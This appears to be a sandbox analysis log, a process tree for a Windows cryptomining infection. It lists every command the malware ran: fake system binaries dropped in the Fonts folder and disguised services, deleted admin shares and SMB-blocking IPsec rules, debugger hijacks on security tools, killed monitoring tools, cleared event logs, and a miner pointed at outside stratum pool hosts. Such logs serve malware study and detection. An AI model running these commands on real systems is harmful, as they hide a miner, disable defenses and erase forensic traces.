-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del2⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\TEMP\csonhost.bat2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 53⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\net.exenet share iPC$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share iPC$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share admin$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share admin$ /delete4⤵
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet share c$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share c$ /delete4⤵
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet share d$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share d$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share e$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share e$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share f$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share f$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y4⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Graphipcs_PerfSvcs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Graphipcs_PerfSvcs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop conhost3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete conhost3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\conhost.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\conhost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsars.exe /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im sqlservr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\sqlservr.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\sqlservr.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\csrss.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\csrss.exe /d everyone3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\lsass.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
- Clears Windows event logs
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del1⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
